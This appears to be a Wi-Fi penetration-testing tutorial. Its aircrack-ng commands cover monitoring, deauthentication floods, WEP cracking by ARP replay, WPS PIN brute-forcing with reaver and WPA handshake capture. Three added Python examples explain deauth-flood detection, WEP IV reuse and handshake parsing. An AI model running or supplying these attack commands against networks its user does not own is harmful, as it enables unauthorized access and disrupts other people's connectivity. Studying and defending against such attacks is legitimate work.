Wireless
Packet Sniffing (airodump)
From the man page: airodump-ng is used for packet capturing of raw 802.11 frames for the intent of using them with aircrack-ng. NOTE: Ctrl-c to exit.
- General wireless packet sniffing is done with airodump-ng, part of the aircrack-ng suite.
- This will give you general information about the wireless networks around you.
Syntax:
airodump-ng [options] <interface name>
Must first enable monitor mode (see here). Then run (assuming interface name wlan0):
airodump-ng wlan0             # 2.4GHz only, quicker
airodump-ng --band a wlan0    # 5GHz, quicker
airodump-ng --band abg wlan0  # 5GHz + 2.4GHz, slower
Once you find a target network in the information provided by airodump, move on…
Targeted Sniffing
Here you specify the target network (BSSID + Channel) you want to play with…
Target One Specific Network: From the general sniff of all traffic you just did, copy the target BSSID and Channel number:
- Run it without --write filename if you just want to see the network and clients on that network.
- You will see two sections: the top is the network, the bottom shows the clients (“stations”) on the network.
airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0
This creates files in your current working directory (filename*.*).
- .cap file: data captured (everything sent to and from target network)
- If the router is set to encrypt, all the data captured will be encrypted
Wireshark: use it to analyze the data you captured… open the .cap file.
DeAuth Attack
Deauthentication Attack: Disconnect any client from any network…
Tool: aireplay-ng
aireplay-ng --deauth=10000000 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
- --deauth=N: number of deauth frames to send (a huge number here, so the program repeats lots)
- -a: MAC address of the access point
- -c: MAC address of the client machine on the network you are deauthenticating
- wlan0: your wireless adapter
- Remember: to get a client MAC address, you run airodump-ng and specify the network in order to see all the clients. The clients show up in the second (lower) block of information, under STATION:
airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X wlan0
This still may fail unless you are also running airodump-ng against the target network (the command just above).
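The defender's side of this, as an added example (my own Python, not part of the aircrack-ng suite or of this page): a deauth frame is an unauthenticated management frame (type 0, subtype 12), so a monitor can spot a flood simply by counting them per BSSID over a short window. The frame builder, sample capture and threshold are assumptions of the example; real captures would also carry a radiotap header in front of the 802.11 header. The mitigation is 802.11w (Protected Management Frames), which makes the AP and clients drop deauth frames that are not integrity-protected.

```python
import struct
from collections import defaultdict

# 802.11 Frame Control byte 0 = (subtype << 4) | (type << 2) | protocol_version
FC_DEAUTH = 0xC0   # type 0 (management), subtype 12 (deauthentication)
FC_BEACON = 0x80   # type 0 (management), subtype 8 (beacon)
FC_DATA = 0x08     # type 2 (data), subtype 0

def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def build_frame(fc0, addr1, addr2, addr3, body=b""):
    """Minimal 802.11 header (frame control, duration, addr1-3, sequence control) + body.
    Constructed test data only: no radiotap header, FCS or real sequence numbers."""
    return (struct.pack("<BBH", fc0, 0, 0) + mac_bytes(addr1) + mac_bytes(addr2)
            + mac_bytes(addr3) + struct.pack("<H", 0) + body)

def parse_frame(raw):
    """Return type/subtype and the three addresses of a raw 802.11 frame, or None if too short."""
    if len(raw) < 24:
        return None
    fc0 = raw[0]
    return {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "addr1": mac_str(raw[4:10]),    # receiver
        "addr2": mac_str(raw[10:16]),   # transmitter
        "addr3": mac_str(raw[16:22]),   # BSSID for management frames
        "body": raw[24:],
    }

def detect_deauth_flood(frames, window_s=1.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_bytes).
    Flags a BSSID when >= threshold deauthentication frames carry its address within window_s.
    Returns a list of (bssid, window_start_ts, count), at most one alert per BSSID."""
    times_by_bssid = defaultdict(list)
    for ts, raw in frames:
        f = parse_frame(raw)
        if f is None or f["type"] != 0 or f["subtype"] != 12:
            continue
        times_by_bssid[f["addr3"]].append(ts)
    alerts = []
    for bssid, times in times_by_bssid.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts.append((bssid, times[start], count))
                break
    return alerts

# Constructed sample capture: one beacon, one data frame, one isolated deauth (normal churn),
# then a burst of 20 deauths 50 ms apart aimed at the same client, as a flooding tool would send.
AP = "aa:bb:cc:dd:ee:01"
CLIENT = "11:22:33:44:55:66"
REASON_CLASS3 = struct.pack("<H", 7)   # reason code 7: class 3 frame from non-associated station
SAMPLE_FRAMES = [
    (0.00, build_frame(FC_BEACON, "ff:ff:ff:ff:ff:ff", AP, AP)),
    (0.10, build_frame(FC_DATA, AP, CLIENT, AP)),
    (0.20, build_frame(FC_DEAUTH, CLIENT, AP, AP, REASON_CLASS3)),
] + [(10.0 + 0.05 * i, build_frame(FC_DEAUTH, CLIENT, AP, AP, REASON_CLASS3)) for i in range(20)]

if __name__ == "__main__":
    for bssid, start, count in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"ALERT: {count} deauth frames for BSSID {bssid} within 1 s starting at t={start:.2f}")
```

The single deauth at t=0.2 is ignored (one per second is normal roaming churn); the burst trips the alert as soon as five frames fall inside one second. Feeding real frames means stripping the radiotap header first and reading the timestamp from the pcap record.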
Encryption
- If your target is wired, you simply connect to it and you're in.
- If your target is wireless w/o encryption, you connect and you're in.
- If your target is wireless + encryption… you need to break in.
WEP
WEP: Wired Equivalent Privacy (Old & Easy)
Tool: aircrack-ng (uses the captured Initialization Vectors to recover the WEP key)
- The IV is sent in plain text (24-bit randomly generated number)
- The IV is prepended (as a prefix) to the WEP key to form the RC4 seed used to encrypt/decrypt each packet
- IV + Key (password) → Key Stream
All you need to do is capture a bunch of packets (airodump-ng), analyze the captured IVs (aircrack-ng) and discover the WEP key.
- Capture specific BSSID + Channel as above. Store capture in file.
- The #DATA column shows the number of useful packets w/ unique WEP IVs.
- The higher the number the more likely you'll be able to crack the key.
- Run aircrack-ng against your airodump-ng capture (.cap) file.
aircrack-ng filename.cap
Take the key from aircrack (XX:XX:XX:XX:XX), remove the colons, and use that number to log into the network.
PROBLEM: If the network isn't busy enough, the #DATA count will not increase enough.
SOLUTION: Generate your own traffic… force access point to generate new IVs.
- Run an “arpreplay” attack
- We cannot connect to the AP but we can associate with it.
TOOL: aireplay-ng
1. Run airodump-ng against your target network (as above) in one term window:
airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0
2. Associate with this network with aireplay-ng in another term window:
aireplay-ng --fakeauth 0 -a [MAC of target router] -h [MAC of wireless adapter] wlan0 # run fake authentication attack once ("0")
3. Now communicate with the network with which you are associated via aireplay-ng:
- Inject packets into router to force it to generate new IVs.
- Use an ARP reply/request attack…
- THEORY: capture an ARP packet, re-transmit it thus forcing the router to produce another packet with new IV. Lather, rinse, repeat.
aireplay-ng --arpreplay -b [MAC of target router] -h [MAC of wireless adapter] wlan0
4. Then run aircrack-ng (airodump-ng numbers its output files, so the filename should be something like arpreplay-01.cap)
aircrack-ng filename.cap
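Why the IV is the whole story, as an added illustration (my own Python, not code from this page or from aircrack-ng): a plain RC4 and a WEP-style encrypt (ICV omitted) that prepends the 24-bit IV to the secret key exactly as described above. It shows that two frames sharing an IV leak the XOR of their plaintexts without any knowledge of the key, and computes the birthday probability that a random 24-bit IV repeats after n packets, which is why the #DATA count, not the network's key length, decides how long WEP survives. The key, IV and plaintexts are constructed sample values.

```python
def rc4(key, length):
    """Plain RC4 keystream generator (KSA + PRGA); key is bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:                   # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(wep_key, iv, plaintext):
    """WEP-style encryption: the 3-byte IV is prepended to the secret key to seed RC4,
    and the IV itself travels in the clear in front of the ciphertext (ICV left out)."""
    assert len(iv) == 3, "WEP IV is 24 bits"
    keystream = rc4(iv + wep_key, len(plaintext))
    return iv + xor_bytes(plaintext, keystream)

def keystream_reuse_leak(frame1, frame2):
    """Two frames with the same IV were encrypted with the same RC4 keystream, so
    C1 xor C2 == P1 xor P2: the keystream cancels out. Returns None if the IVs differ."""
    if frame1[:3] != frame2[:3]:
        return None
    return xor_bytes(frame1[3:], frame2[3:])

def iv_collision_probability(n_packets, iv_bits=24):
    """Exact birthday-bound probability that at least two of n uniformly random IVs
    drawn from a 2**iv_bits space collide."""
    space = 2 ** iv_bits
    p_no_collision = 1.0
    for i in range(n_packets):
        p_no_collision *= (space - i) / space
    return 1.0 - p_no_collision

if __name__ == "__main__":
    # Constructed sample values; a real WEP key would be 5 or 13 bytes, as here.
    key = bytes([0x01, 0x02, 0x03, 0x04, 0x05])
    iv = b"\xaa\xbb\xcc"
    p1, p2 = b"hello, world!!!", b"goodbye, world!"
    c1, c2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    print("leaked P1^P2 matches:", keystream_reuse_leak(c1, c2) == xor_bytes(p1, p2))
    for n in (1000, 4823, 20000):
        print(f"P(IV repeat after {n} packets) = {iv_collision_probability(n):.3f}")
```

Around 4800 packets already give a 50% chance of a repeated IV, and a busy AP sends that in seconds; the ARP replay trick above just makes a quiet network behave like a busy one.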
WPA & WPA2
The only difference is the encryption method: WPA uses TKIP and WPA2 uses CCMP. The same methods will work with both WPA and WPA2.
Misconfiguration Exploit: WPS (allows clients to connect without the password).
- Originally provided to simplify connecting printers and other peripherals.
- “PBC”: Push Button Configuration (peripherals and router had a WPS button).
- Authenticates against an 8-digit PIN (8 numbers). Easy hack.
- Router, however, must be misconfigured to use PIN authentication, NOT the PBC.
- Check this first (since WPA/WPA2 are so difficult to crack).
1. TOOL: wash (display all networks with WPS enabled). You may need to put your wireless interface into auto mode instead of monitor mode.
wash --interface wlan0    # if this errors out, do the following...
ifconfig wlan0 down       # or ifdown wlan0
iwconfig wlan0 mode auto
ifconfig wlan0 up         # or ifup wlan0
wash --interface wlan0    # remember to change mode back to monitor for the hacks
2. Associate with the network (as above)… set this up but DO NOT RUN IT YET…
aireplay-ng --fakeauth 30 -a [MAC of target router] -h [MAC of wireless adapter] wlan0 # associate with the target network every 30 seconds
3. In another term window run reaver to brute force the PIN:
reaver --bssid [MAC of target router] --channel [#] --interface wlan0 -vvv --no-associate
4. Launch reaver and then the aireplay-ng command you set up but did not run.
- If WPS is not misconfigured or PBC is set… then this won't work. Move on…
WPA/WPA2 CRACKING: The only packets that can aid cracking are the handshake packets.
- These are 4 packets sent when a client connects to the network
1. Run airodump-ng against all reachable networks…
airodump-ng wlan0             # 2.4GHz only, quicker
airodump-ng --band a wlan0    # 5GHz, quicker
airodump-ng --band abg wlan0  # 5GHz + 2.4GHz, slower
2. Find your target router and run airodump-ng to dump data to a file…
airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0
3. Let it run and wait for the handshake to occur (someone to connect to router).
4. If you're impatient, deauthenticate a current user and he'll connect again, giving you the handshake you want.
aireplay-ng --deauth 4 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0 # repeat 4x; -a router MAC, -c MAC of client to disconnect
5. Use that WPA handshake value to get the key for the wireless network (see next).
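What those four handshake packets look like on the wire, as an added example (my own Python, not from this page or from aircrack-ng): each one is an EAPOL-Key frame (EAPOL type 3) and its position in the exchange is readable from the Key Information flags defined in 802.11i (Install 0x0040, Key ACK 0x0080, Key MIC 0x0100, Secure 0x0200). A monitoring tool can use the same classification to count handshakes per client and spot the deauth-then-reconnect pattern from step 4, or to confirm a capture is complete before archiving it. The sample frames are constructed with zeroed nonces and MICs; in a real capture they sit inside 802.11 data frames behind an LLC/SNAP header with EtherType 0x888E.

```python
import struct

# EAPOL-Key "Key Information" flag bits (IEEE 802.11i / RSN)
KEY_INFO_INSTALL = 0x0040
KEY_INFO_ACK = 0x0080
KEY_INFO_MIC = 0x0100
KEY_INFO_SECURE = 0x0200

def build_eapol_key(key_info, replay_counter, key_data=b""):
    """Constructed EAPOL-Key frame: EAPOL header (version 2, type 3, length) + RSN key descriptor.
    Nonce, IV, RSC, key ID and MIC fields are zeroed; only the flags and lengths matter here."""
    body = struct.pack(">BHHQ", 2, key_info, 16, replay_counter)   # descriptor type 2 = RSN
    body += bytes(32) + bytes(16) + bytes(8) + bytes(8) + bytes(16)  # nonce, IV, RSC, key ID, MIC
    body += struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body

def parse_eapol_key(raw):
    """Return (key_info, replay_counter, key_data_len), or None if this is not an EAPOL-Key frame."""
    if len(raw) < 4 + 95:
        return None
    _version, ptype, length = struct.unpack(">BBH", raw[:4])
    if ptype != 3:
        return None
    body = raw[4:4 + length]
    _desc_type, key_info, _key_len, replay = struct.unpack(">BHHQ", body[:13])
    key_data_len = struct.unpack(">H", body[93:95])[0]
    return key_info, replay, key_data_len

def handshake_message_number(key_info, key_data_len):
    """Map Key Information flags to message 1-4 of the 4-way handshake (None if unrecognised)."""
    ack = bool(key_info & KEY_INFO_ACK)
    mic = bool(key_info & KEY_INFO_MIC)
    install = bool(key_info & KEY_INFO_INSTALL)
    secure = bool(key_info & KEY_INFO_SECURE)
    if ack and not mic:
        return 1                      # AP -> client: ANonce
    if ack and mic and install:
        return 3                      # AP -> client: install PTK, deliver GTK
    if mic and not ack and not install:
        # message 4 sets Secure and carries no key data; message 2 carries the RSN IE
        return 4 if (secure or key_data_len == 0) else 2
    return None

def handshake_messages(frames):
    """Classify every EAPOL-Key frame in a list and return the sorted message numbers seen."""
    seen = set()
    for raw in frames:
        parsed = parse_eapol_key(raw)
        if parsed is None:
            continue
        key_info, _replay, key_data_len = parsed
        number = handshake_message_number(key_info, key_data_len)
        if number is not None:
            seen.add(number)
    return sorted(seen)

def has_full_handshake(frames):
    return handshake_messages(frames) == [1, 2, 3, 4]

# Constructed sample: a non-EAPOL blob, then M1..M4 with the flag values such frames commonly carry.
SAMPLE_RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # constructed RSN IE
SAMPLE_HANDSHAKE = [
    b"\x00" * 120,                                   # not EAPOL: ignored
    build_eapol_key(0x008A, 1),                      # M1: pairwise, ACK
    build_eapol_key(0x010A, 1, SAMPLE_RSN_IE),       # M2: pairwise, MIC, RSN IE in key data
    build_eapol_key(0x13CA, 2, bytes(56)),           # M3: install, ACK, MIC, secure, encrypted key data
    build_eapol_key(0x030A, 2),                      # M4: MIC, secure, empty key data
]

if __name__ == "__main__":
    print("messages seen:", handshake_messages(SAMPLE_HANDSHAKE))
    print("complete 4-way handshake:", has_full_handshake(SAMPLE_HANDSHAKE))
```

A stream of repeated message 1/2 pairs for the same client within a few seconds of a deauth burst is the footprint of the forced-reconnect trick above; the same parser lets a wireless IDS count it.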
We'll have some more goodies later…